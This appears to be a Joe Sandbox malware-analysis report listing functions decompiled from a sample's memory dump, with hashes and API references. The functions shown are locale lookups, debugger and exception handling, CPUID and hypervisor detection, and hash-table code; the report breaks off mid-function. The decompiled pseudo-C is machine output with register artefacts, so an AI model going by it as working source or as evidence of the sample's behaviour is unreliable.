Part of subcall function 000F55BA: SetLastError.KERNEL32(00000000,?), ref: 000F5660

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000FA584
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000FA5CE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000FA694

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: ae4659bf0c355460f15f9376487fd8438c7d94f96f942f5c6ce7bcdf3617fff8
Instruction ID: 7ae0c299a3ef9394553bb0c15ccf7db04c634e5e4a216cbac7bd513629dbc9c8
Opcode Fuzzy Hash: ae4659bf0c355460f15f9376487fd8438c7d94f96f942f5c6ce7bcdf3617fff8
Instruction Fuzzy Hash: 8661A6B161460B9FDB689F24CD86FBA77F8EF05300F144175EA09C6A82EB34D980EB51

Uniqueness

Uniqueness Score: -1.00%

Function 000F70E0 Relevance: 4.6, APIs: 3, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E000F70E0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x120014; // 0xf049169a
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E000DE202(_t41);
					_pop(_t61);
				}
				E000E11A0(_t66,  &_v804, 0, 0x50);
				E000E11A0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E000DE202(_t57);
				}
				return E000DE643(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x000f70e0
0x000f70e0
0x000f70e0
0x000f70eb
0x000f70f0
0x000f70f2
0x000f70fa
0x000f70fc
0x000f70ff
0x000f7104
0x000f7104
0x000f7110
0x000f7123
0x000f7131
0x000f7137
0x000f713d
0x000f7143
0x000f7149
0x000f714f
0x000f7155
0x000f715b
0x000f7161
0x000f7167
0x000f716e
0x000f7175
0x000f717c
0x000f7183
0x000f718a
0x000f7191
0x000f7192
0x000f719b
0x000f71a1
0x000f71a4
0x000f71aa
0x000f71b7
0x000f71c0
0x000f71c9
0x000f71d2
0x000f71e0
0x000f71e2
0x000f71f7
0x000f7203
0x000f7206
0x000f720b
0x000f7218

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 000F71D8
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 000F71E2
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 000F71EF

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e2e32de7ccffb68f3d5c5711c0a1df0e2ca14f8170f730f1e7bda8e17093ce40
Instruction ID: 75590db84807b1663d76461eb3923a5db83ae8052f42365e872f1007367b0c64
Opcode Fuzzy Hash: e2e32de7ccffb68f3d5c5711c0a1df0e2ca14f8170f730f1e7bda8e17093ce40
Instruction Fuzzy Hash: DD31D37490122C9BCB61DF28DD89BDDBBB8BF08310F5041DAE51CA62A1E7709B818F55

Uniqueness

Uniqueness Score: -1.00%

Function 000DB5D0 Relevance: 3.9, Strings: 3, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 38%

			E000DB5D0(intOrPtr* __ecx, signed char __edx) {
				unsigned int _v20;
				intOrPtr* _v24;
				signed int _t63;
				signed int _t64;
				intOrPtr* _t75;
				signed int _t76;
				signed int _t79;
				signed char _t85;
				unsigned int _t88;

				_t84 = __edx;
				_t90 = __ecx;
				asm("cpuid");
				if(0 > 0) {
					_v24 = __ecx;
					asm("cpuid");
					_v20 = 0;
					_t68 = 0;
					if(0 >= 7) {
						asm("cpuid");
						_t84 = __edx;
						_t68 = 0;
					}
					_t75 = _v24;
					 *_t75 = 1;
					 *((intOrPtr*)(_t75 + 8)) = 1;
					 *((intOrPtr*)(_t75 + 4)) = 1;
					_t90 = _t75;
					 *(_t75 + 0xc) = _t84 >> 0x00000017 & 0x00000001;
					 *(_t75 + 0xd) = _t84 >> 0x00000019 & 0x00000001;
					 *(_t75 + 0xe) = _t84 >> 0x0000001a & 0x00000001;
					_t76 = _v20;
					 *(_t90 + 0xf) = _t76 & 0x00000001;
					 *(_t90 + 0x10) = _t76 >> 0x00000009 & 0x00000001;
					 *(_t90 + 0x11) = _t76 >> 0x00000013 & 0x00000001;
					 *(_t90 + 0x12) = _t76 >> 0x00000014 & 0x00000001;
					 *(_t90 + 0x13) = _t76 >> 0x00000017 & 0x00000001;
					 *((char*)(_t90 + 0x19)) = _t76 >> 0x1f;
					_t63 =  !_t76;
					if((_t63 & 0x1c000000) != 0) {
						_t64 = 0;
					} else {
						asm("xgetbv");
						_t64 =  !_t63 & 0xffffff00 | ( !_t63 & 0x00000006) == 0x00000000;
					}
					 *(_t90 + 0x14) = _t64;
					_t88 = _v20;
					_t79 = _t88 >> 0x00000019 & 0x00000001;
					 *(_t90 + 0x17) = _t79;
					_t84 = _t88 >> 0x0000000c & 0x00000001;
					 *(_t90 + 0x15) = _t84;
					 *(_t90 + 0x16) = (_t79 & 0xffffff00 | _t68 != 0x00000000) & (_t64 & 0xffffff00 | _t64 != 0x00000000);
				}
				_t36 = 0x80000000;
				asm("cpuid");
				if(0x80000000 <= 0x80000006) {
					_t85 =  *(_t90 + 0x18);
					if(_t85 == 0) {
						goto L11;
					}
				} else {
					_t36 = 0x80000007;
					asm("cpuid");
					_t85 = _t84 & 0x00000001;
					 *(_t90 + 0x18) = _t85;
					if(_t85 == 0) {
						L11:
						if( *((char*)(_t90 + 0x19)) != 0) {
							_t36 = 0x40000000;
							asm("cpuid");
							if(_t68 == 0x7263694d && 0 == 0x666f736f && _t85 == 0x76482074) {
								 *(_t90 + 0x18) = 1;
								return 0x40000000;
							}
						}
					}
				}
				return _t36;
			}

0x000db5d0
0x000db5d9
0x000db5df
0x000db5e3
0x000db5eb
0x000db5f5
0x000db5f7
0x000db5ff
0x000db604
0x000db60f
0x000db611
0x000db613
0x000db613
0x000db616
0x000db619
0x000db620
0x000db629
0x000db62c
0x000db635
0x000db63f
0x000db648
0x000db64b
0x000db652
0x000db65c
0x000db666
0x000db670
0x000db67a
0x000db682
0x000db687
0x000db68e
0x000db69e
0x000db690
0x000db692
0x000db699
0x000db699
0x000db6a0
0x000db6a3
0x000db6ab
0x000db6ae
0x000db6b4
0x000db6b7
0x000db6c6
0x000db6c6
0x000db6c9
0x000db6d0
0x000db6d7
0x000db6ee
0x000db6f3
0x00000000
0x00000000
0x000db6d9
0x000db6d9
0x000db6e0
0x000db6e2
0x000db6e5
0x000db6ea
0x000db6f5
0x000db6f9
0x000db6fb
0x000db702
0x000db70a
0x000db71c
0x00000000
0x000db71c
0x000db70a
0x000db6f9
0x000db6ea
0x000db727

Strings

t Hv, xrefs: 000DB714
osof, xrefs: 000DB70C
Micr, xrefs: 000DB704

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID: Micr$osof$t Hv
API String ID: 0-2053847325
Opcode ID: d5d9e0e05a2c30fc61a8331b182233f90f795c872c5ebd243d906a29780eb6ce
Instruction ID: be3981528d4ab74ddbe0229752c4e4128fc1b6d1711b51dfabb4d96bccd5b618
Opcode Fuzzy Hash: d5d9e0e05a2c30fc61a8331b182233f90f795c872c5ebd243d906a29780eb6ce
Instruction Fuzzy Hash: D7414C72B183879BD74D893C44413A9BBA29B71318F19826ECC44DB343CA57EE96C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 000791F0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E000791F0(unsigned int __ecx, void* __eflags, intOrPtr __fp0, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v20;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				signed int _t102;
				signed int _t104;
				signed int _t105;
				signed int _t108;
				signed int _t113;
				signed int _t117;
				signed int _t121;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t129;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int* _t140;
				unsigned int _t153;
				signed int _t156;
				intOrPtr* _t158;
				signed int _t162;
				signed int _t163;
				signed int _t166;
				signed int _t175;
				signed int _t176;
				signed int* _t177;
				unsigned int _t180;
				signed int _t183;
				intOrPtr _t198;

				_t198 = __fp0;
				_t180 = __ecx;
				_t90 =  *0x120014; // 0xf049169a
				_v20 = _t90 ^ _t183;
				_v36 = L00076AF8(_a8);
				_t127 =  *(_t180 + 4);
				_t133 = 0xffffffffffffffff;
				_t175 = 0xffffffffffffffff;
				if(_t127 == 0) {
					L19:
					_t158 =  &_v32;
					 *((intOrPtr*)(_t158 + 8)) = _t133;
					 *((intOrPtr*)(_t158 + 4)) = _t133;
					 *_t158 = _t133;
					_t134 = _t180;
					E00079448(_t134, _t198, _t158, _v36, _a12);
					asm("movq xmm2, [0x110dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [esi+0x10]");
					__eflags = _t127;
					if(__eflags == 0) {
						L21:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t97 = E001036A0(_t134);
						_v56 = _t198;
						asm("movss xmm0, [ebp-0x34]");
						asm("cvttss2si ecx, xmm0");
						asm("subss xmm0, [0x110dd8]");
						asm("cvttss2si eax, xmm0");
						_t99 = _t97 & _t134 >> 0x0000001f | _t134;
						_t135 = _t127 + _t127;
						__eflags = _t127 - 3;
						if(_t127 < 3) {
							_t162 = 1;
							__eflags = 1;
						} else {
							_v40 = _t180;
							__eflags = _t127 & _t127 - 0x00000001;
							_t180 = _v40;
							_t162 = 0 | (_t127 & _t127 - 0x00000001) != 0x00000000;
						}
						_t163 = _t162 | _t135;
						__eflags = _t163 - _t99;
						_t164 =  <=  ? _t99 : _t163;
						E000794B2(_t180, _t198,  <=  ? _t99 : _t163);
						_t127 =  *(_t180 + 4);
						_t176 = _t127 - 1;
						__eflags = _t127 & _t176;
						if((_t127 & _t176) != 0) {
							_t175 = _v36;
							__eflags = _t175 - _t127;
							if(_t175 >= _t127) {
								_t59 = _t175 % _t127;
								__eflags = _t59;
								_t175 = _t59;
							}
						} else {
							_t175 = _t176 & _v36;
						}
						L28:
						_t102 =  *( *_t180 + _t175 * 4);
						__eflags = _t102;
						if(_t102 == 0) {
							_t165 = _v32;
							 *_v32 =  *(_t180 + 8);
							 *(_t180 + 8) = _v32;
							 *( *_t180 + _t175 * 4) = _t180 + 8;
							_t140 = _v32;
							_t104 =  *_t140;
							__eflags = _t104;
							if(_t104 != 0) {
								_t108 =  *(_t104 + 4);
								_t166 = _t127 - 1;
								__eflags = _t127 & _t166;
								if((_t127 & _t166) != 0) {
									__eflags = _t108 - _t127;
									if(_t108 >= _t127) {
										_t79 = _t108 % _t127;
										__eflags = _t79;
										_t108 = _t79;
									}
								} else {
									_t108 = _t108 & _t166;
								}
								_t165 =  *_t180;
								 *( *_t180 + _t108 * 4) = _t140;
							}
						} else {
							_t165 = _v32;
							 *_v32 =  *_t102;
							 *_t102 = _v32;
						}
						_t128 = _v32;
						_t85 = _t180 + 0xc;
						 *_t85 =  *(_t180 + 0xc) + 1;
						__eflags =  *_t85;
						_t105 = 1;
						goto L37;
					}
					asm("movd xmm3, ebx");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L28;
					}
					goto L21;
				} else {
					_v40 = _t180;
					_t113 = _t127 - (_t127 >> 0x00000001 & 0x55555555);
					_t165 = _t113 & 0x33333333;
					_t180 = (((_t113 >> 0x00000002 & 0x33333333) + (_t113 & 0x33333333) >> 0x00000004) + (_t113 >> 0x00000002 & 0x33333333) + (_t113 & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
					if(_t180 > 1) {
						_t117 = _v36;
						_t175 = _t117;
						__eflags = _t117 - _t127;
						if(_t117 >= _t127) {
							_t11 = _v36 % _t127;
							__eflags = _t11;
							_t165 = _t11;
							_t175 = _t11;
						}
					} else {
						_t175 = _t127 - 0x00000001 & _v36;
					}
					_v44 = _t127;
					_t153 = _v40;
					_t129 =  *((intOrPtr*)( *_t153 + _t175 * 4));
					if(_t129 == 0) {
						_t180 = _t153;
						_t127 = _v44;
						L18:
						_t133 = 0xffffffffffffffff;
						__eflags = 0xffffffffffffffff;
						goto L19;
					}
					_v48 = _t175;
					_v52 = _v44 - 1;
					while(1) {
						_t129 =  *_t129;
						if(_t129 == 0) {
							break;
						}
						_t121 =  *(_t129 + 4);
						if(_t121 == _v36) {
							L14:
							if(L00076B8C(_t129 + 8, _a8) == 0) {
								continue;
							}
							_t105 = 0;
							L37:
							_t177 = _a4;
							 *_t177 = _t128;
							_t177[1] = _t105;
							E000DE643(_t105, _t128, _v20 ^ _t183, _t165, _t177, _t180);
							return _t177;
						}
						if(_t180 > 1) {
							_t156 = _v44;
							__eflags = _t121 - _t156;
							if(_t121 >= _t156) {
								_t27 = _t121 % _t156;
								__eflags = _t27;
								_t165 = _t27;
								_t121 = _t27;
							}
						} else {
							_t121 = _t121 & _v52;
						}
						if(_t121 != _v48) {
							break;
						} else {
							goto L14;
						}
					}
					_t180 = _v40;
					_t127 = _v44;
					_t175 = _v48;
					goto L18;
				}
			}

0x000791f0
0x000791f9
0x000791fb
0x00079202
0x00079210
0x00079213
0x00079218
0x00079219
0x0007921d
0x000792ed
0x000792f0
0x000792f3
0x000792f6
0x000792f9
0x000792fb
0x00079302
0x0007930b
0x00079313
0x00079317
0x0007931b
0x0007931f
0x00079323
0x00079328
0x0007932a
0x0007934c
0x0007934c
0x00079350
0x00079357
0x0007935c
0x00079364
0x00079367
0x0007936c
0x00079375
0x0007937d
0x00079383
0x00079385
0x00079388
0x0007938b
0x000793a1
0x000793a1
0x0007938d
0x0007938d
0x00079395
0x00079397
0x0007939a
0x0007939a
0x000793a2
0x000793a4
0x000793a6
0x000793ac
0x000793b1
0x000793b4
0x000793b7
0x000793b9
0x000793c0
0x000793c3
0x000793c5
0x000793cb
0x000793cb
0x000793cd
0x000793cd
0x000793bb
0x000793bb
0x000793bb
0x000793cf
0x000793d1
0x000793d4
0x000793d6
0x000793ec
0x000793ef
0x000793f4
0x000793f9
0x000793fc
0x000793ff
0x00079401
0x00079403
0x00079405
0x00079408
0x0007940b
0x0007940d
0x00079413
0x00079415
0x00079419
0x00079419
0x0007941b
0x0007941b
0x0007940f
0x0007940f
0x0007940f
0x0007941d
0x0007941f
0x0007941f
0x000793d8
0x000793da
0x000793dd
0x000793e2
0x000793e2
0x00079422
0x00079425
0x00079425
0x00079425
0x00079428
0x00000000
0x00079428
0x0007932c
0x00079330
0x00079334
0x00079338
0x0007933b
0x0007933f
0x00079343
0x00079346
0x00000000
0x00000000
0x00000000
0x00079223
0x00079223
0x00079232
0x0007923b
0x00079257
0x0007925d
0x00079267
0x0007926a
0x0007926c
0x0007926e
0x00079275
0x00079275
0x00079275
0x00079277
0x00079277
0x0007925f
0x00079262
0x00079262
0x00079279
0x0007927c
0x00079281
0x00079286
0x000792e5
0x000792e7
0x000792ea
0x000792ec
0x000792ec
0x00000000
0x000792ec
0x00079288
0x0007928f
0x00079295
0x00079295
0x00079299
0x00000000
0x00000000
0x0007929b
0x000792a1
0x000792c1
0x000792d1
0x00000000
0x00000000
0x000792d3
0x0007942a
0x0007942a
0x0007942d
0x0007942f
0x00079437
0x00079445
0x00079445
0x000792a6
0x000792ad
0x000792b0
0x000792b2
0x000792b6
0x000792b6
0x000792b6
0x000792b8
0x000792b8
0x000792a8
0x000792a8
0x000792a8
0x000792bf
0x00000000
0x00000000
0x00000000
0x00000000
0x000792bf
0x000792da
0x000792dd
0x000792e0
0x00000000
0x000792e0

APIs

__floor_pentium4.LIBCMT ref: 0007935C

Strings

3333, xrefs: 00079234

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __floor_pentium4
String ID: 3333
API String ID: 4168288129-2924271548
Opcode ID: 00cb69b58cfd43a8edaa4a9d4c2cdc7e04862fd749fdaeb07c49371efa1dd680
Instruction ID: 81b5d6801a5dc6357f73dfaafc4869b1e4415471bb08372865a1b0f95fc64eb8
Opcode Fuzzy Hash: 00cb69b58cfd43a8edaa4a9d4c2cdc7e04862fd749fdaeb07c49371efa1dd680
Instruction Fuzzy Hash: C5819171F046098BCB19DF6AD8809ADF7F6BF9D310718C629E81ABB341D735AC428B54

Uniqueness

Uniqueness Score: -1.00%

Function 0009E4D0 Relevance: 3.4, APIs: 2, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d13dd5c7ccaea45b5b2d3a48ef903c3ad070a4634b3dc8bfbbfe82c118fbfcd
Instruction ID: 67c09a40497cf7b8359c76be400c90d583f2843ae0c04f9b2c64fb4cfc2101a4
Opcode Fuzzy Hash: 9d13dd5c7ccaea45b5b2d3a48ef903c3ad070a4634b3dc8bfbbfe82c118fbfcd
Instruction Fuzzy Hash: 2AD1E271B146558BCF19CF69C88066EF7E2AF99350B19C62DD856EB241EB30EC80DB90

Uniqueness

Uniqueness Score: -1.00%

Function 000D1660 Relevance: 3.3, APIs: 2, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97adf9a3c09f2b47a24f7188e433815ba4bb0fae3fd396066ef236136e5a8a85
Instruction ID: 5ca2fdf1af4d2da9fc08dfb14683d1384d7a7aad707e13b3bd71962567297903
Opcode Fuzzy Hash: 97adf9a3c09f2b47a24f7188e433815ba4bb0fae3fd396066ef236136e5a8a85
Instruction Fuzzy Hash: E9C1A371B147069FCB19CF69C8905AEF7B2BF99350B19C62AE456A7350DB30E881CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000B6340 Relevance: 3.3, APIs: 2, Instructions: 288COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 000B64F3
__floor_pentium4.LIBCMT ref: 000B6591

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: bbfdd8b195619e45b09f2b14c57d23141a631ba6e9744dfbe0972245f17ba214
Instruction ID: bf50c37198c7c72dfb5959b1f6e918d872bee7e4a7b48923621df592d8650a54
Opcode Fuzzy Hash: bbfdd8b195619e45b09f2b14c57d23141a631ba6e9744dfbe0972245f17ba214
Instruction Fuzzy Hash: 26B1B571E10A158FCB19CF69C4812ADF7F2BF98310B18C629E85AE7345D736EC918B81

Uniqueness

Uniqueness Score: -1.00%

Function 000CB350 Relevance: 3.3, APIs: 2, Instructions: 284
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E000CB350(intOrPtr* __ecx, intOrPtr __fp0, signed int** _a4, signed int* _a8, signed int** _a16) {
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int* _t99;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				signed int _t111;
				signed int _t114;
				signed int _t116;
				signed int* _t117;
				signed int* _t118;
				signed int _t120;
				signed int _t124;
				signed int _t126;
				signed int _t138;
				unsigned int _t142;
				signed int* _t143;
				signed int** _t144;
				signed int _t146;
				signed int _t148;
				signed int _t152;
				signed int _t161;
				signed int _t164;
				signed int _t176;
				signed int _t177;
				signed int _t179;
				signed int _t202;
				signed int _t203;
				signed int _t209;
				unsigned int _t210;
				unsigned int _t212;
				signed int _t213;
				intOrPtr* _t214;
				signed int _t215;
				signed int _t216;
				signed int** _t217;
				signed int* _t218;
				signed int* _t219;
				intOrPtr _t230;

				_t230 = __fp0;
				_v20 = __ecx;
				_t213 =  *_a8;
				_v24 = (((_t213 * 0x5bd1e995 >> 0x00000018 ^ _t213 * 0x5bd1e995) * 0x5bd1e995 ^ 0x6f47a654) >> 0x0000000d ^ (_t213 * 0x5bd1e995 >> 0x00000018 ^ _t213 * 0x5bd1e995) * 0x5bd1e995 ^ 0x6f47a654) * 0x5bd1e995 >> 0x0000000f ^ (((_t213 * 0x5bd1e995 >> 0x00000018 ^ _t213 * 0x5bd1e995) * 0x5bd1e995 ^ 0x6f47a654) >> 0x0000000d ^ (_t213 * 0x5bd1e995 >> 0x00000018 ^ _t213 * 0x5bd1e995) * 0x5bd1e995 ^ 0x6f47a654) * 0x5bd1e995;
				_t142 =  *(__ecx + 4);
				_v28 = _t142;
				if(_t142 == 0) {
					_v36 = 0xffffffff;
					L16:
					_t214 = _v20;
					_t146 = _t214 + 0xc;
					 *_t218 = 1;
					_v32 = _t146;
					_t99 = L000CAE40(_t146, _t230);
					_t219 = _t218 - 4;
					_t143 = _t99;
